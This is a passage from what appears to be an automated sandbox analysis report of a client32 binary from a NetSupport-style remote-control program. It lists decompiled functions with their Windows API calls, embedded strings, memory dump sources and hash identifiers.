                                                                                                                              • gethostname.WSOCK32(?,00000200,0000005C,00000000,?), ref: 110D8290
                                                                                                                              • gethostbyname.WSOCK32(?), ref: 110D82C1
                                                                                                                              • inet_ntoa.WSOCK32 ref: 110D82EC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterException@8FormatMessageSectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
                                                                                                                              • String ID: 127.0.0.1
                                                                                                                              • API String ID: 2982652134-3619153832
                                                                                                                              • Opcode ID: e8bc3393b8fd347ca8c821a12a24ff93290f6d224345be98ca8ff566579db64b
                                                                                                                              • Instruction ID: aa17ea021d3ed84f241b33fe3108128a88572c75fddb31a861601ff691f486d7
                                                                                                                              • Opcode Fuzzy Hash: e8bc3393b8fd347ca8c821a12a24ff93290f6d224345be98ca8ff566579db64b
                                                                                                                              • Instruction Fuzzy Hash: C651B675D00758AFDB24CFA4C884B9EFBB8EB08714F00466DE45697680DB75AA48CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11005204 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetMenuItemCount.USER32 ref: 1100521E
                                                                                                                              • _memset.LIBCMT ref: 11005240
                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                                                              • EnableMenuItem.USER32 ref: 110052C7
                                                                                                                              • GetMenuItemInfoA.USER32 ref: 110052E8
                                                                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 2755257978-4108050209
                                                                                                                              • Opcode ID: 0984eadfe7c844e2ccc965d3709d2c6d219dcc23d04bdadbd86e0c6c3f5531a9
                                                                                                                              • Instruction ID: 4db8b346694db44d39b576b7e70698c7c1d126aaf22547f2615f3886912727fb
                                                                                                                              • Opcode Fuzzy Hash: 0984eadfe7c844e2ccc965d3709d2c6d219dcc23d04bdadbd86e0c6c3f5531a9
                                                                                                                              • Instruction Fuzzy Hash: AF31B070D01219ABEB01DFA4C988BDEBBFCEF46398F008059F851EA240D7B59A44CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11148010 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • Callstack:, xrefs: 111480FF
                                                                                                                              • %02X , xrefs: 111480E2
                                                                                                                              • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114809D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wsprintf$CurrentReadThread
                                                                                                                              • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                                                                              • API String ID: 477357799-160799177
                                                                                                                              • Opcode ID: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                                                                              • Instruction ID: 6f7d134abcf48abb40f6f3b0b22a813e08fdaf2ee64347ae44ec59e5a96c1c79
                                                                                                                              • Opcode Fuzzy Hash: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                                                                              • Instruction Fuzzy Hash: 23410DB1200705AFDB54CFA8DC90F97B7E9BB48608F148918F96DC7644DB30B914CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _strncmp.LIBCMT ref: 1100953A
                                                                                                                              • _strncmp.LIBCMT ref: 1100954A
                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,30AC22AD), ref: 110095EB
                                                                                                                              Strings
                                                                                                                              • https://, xrefs: 1100952F
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                                              • IsA(), xrefs: 110095A5, 110095CD
                                                                                                                              • http://, xrefs: 11009535, 11009548
                                                                                                                              • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _strncmp$FileWrite
                                                                                                                              • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                              • API String ID: 1635020204-3154135529
                                                                                                                              • Opcode ID: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
                                                                                                                              • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                                              • Opcode Fuzzy Hash: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
                                                                                                                              • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDlgItemTextA.USER32 ref: 110233C2
                                                                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                                                              • SetDlgItemTextA.USER32 ref: 110233FD
                                                                                                                              • GetDlgItem.USER32 ref: 11023414
                                                                                                                              • SetFocus.USER32(00000000), ref: 11023417
                                                                                                                              • GetDlgItem.USER32 ref: 11023445
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                              • API String ID: 1605826578-1986719024
                                                                                                                              • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                              • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                                                              • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                                                              • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 74472576-4108050209
                                                                                                                              • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                              • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                                                              • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                                                              • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110F0060 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 110F0067
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,110F0E7E,?,?,30AC22AD), ref: 110F009F
                                                                                                                              • ReleaseDC.USER32 ref: 110F00AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocGlobalRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1459782005-0
                                                                                                                              • Opcode ID: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                                                                              • Instruction ID: 895e16ec520d13b6265c6dc70c6115b10cf0d765340dc232e34c0638dbe3d9ef
                                                                                                                              • Opcode Fuzzy Hash: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
                                                                                                                              • Instruction Fuzzy Hash: BF113172A41228A7D3209B949DC9FDBB7ECEB4C716F000179FD19C3604E6755C0043E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1106E2A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnterCriticalSection.KERNEL32(?,30AC22AD,?,?,?), ref: 1106E322
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,1106C3F0,?,?,?,?,?), ref: 1106E402
                                                                                                                              Strings
                                                                                                                              • erased=%d, idata->dead=%d, xrefs: 1106E4D3
                                                                                                                              • ..\ctl32\Connect.cpp, xrefs: 1106E4EA
                                                                                                                              • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106E305
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterEventSection
                                                                                                                              • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                                                                              • API String ID: 2291802058-2272698802
                                                                                                                              • Opcode ID: a1cf9193362e2d439727a4af7809b58bdb712297379514ee0693422a3668fc3d
                                                                                                                              • Instruction ID: 66fcff3922a30ee90d8c0767053203911b60367f0834e94f449308d57fcee819
                                                                                                                              • Opcode Fuzzy Hash: a1cf9193362e2d439727a4af7809b58bdb712297379514ee0693422a3668fc3d
                                                                                                                              • Instruction Fuzzy Hash: 9371C074E043A59FE715CF64C488F9ABBE9BB04318F1485D9E41A9B291DB30ED85CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11158310 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 11158356
                                                                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                              • _memset.LIBCMT ref: 1115836F
                                                                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 111583CF
                                                                                                                              • _malloc.LIBCMT ref: 111583F7
                                                                                                                              • _free.LIBCMT ref: 111584D3
                                                                                                                              • _free.LIBCMT ref: 111584DF
                                                                                                                                • Part of subcall function 110EE290: _memmove.LIBCMT ref: 110EE3AF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                                                                              • String ID: (
                                                                                                                              • API String ID: 3140430649-3887548279
                                                                                                                              • Opcode ID: 4ae59a51542be515e35ac12457a05027348913e2ca7b28daaf804b266938950c
                                                                                                                              • Instruction ID: 15e3a403059262efe8d3bf227268a655022ed24b1a0bcf9f4d942b7dba633f9b
                                                                                                                              • Opcode Fuzzy Hash: 4ae59a51542be515e35ac12457a05027348913e2ca7b28daaf804b266938950c
                                                                                                                              • Instruction Fuzzy Hash: F05162B5A112149FDB54DF18CC80B9AB7B9EF89308F4545ADEA09DB341DB30BA44CF68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110E13B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
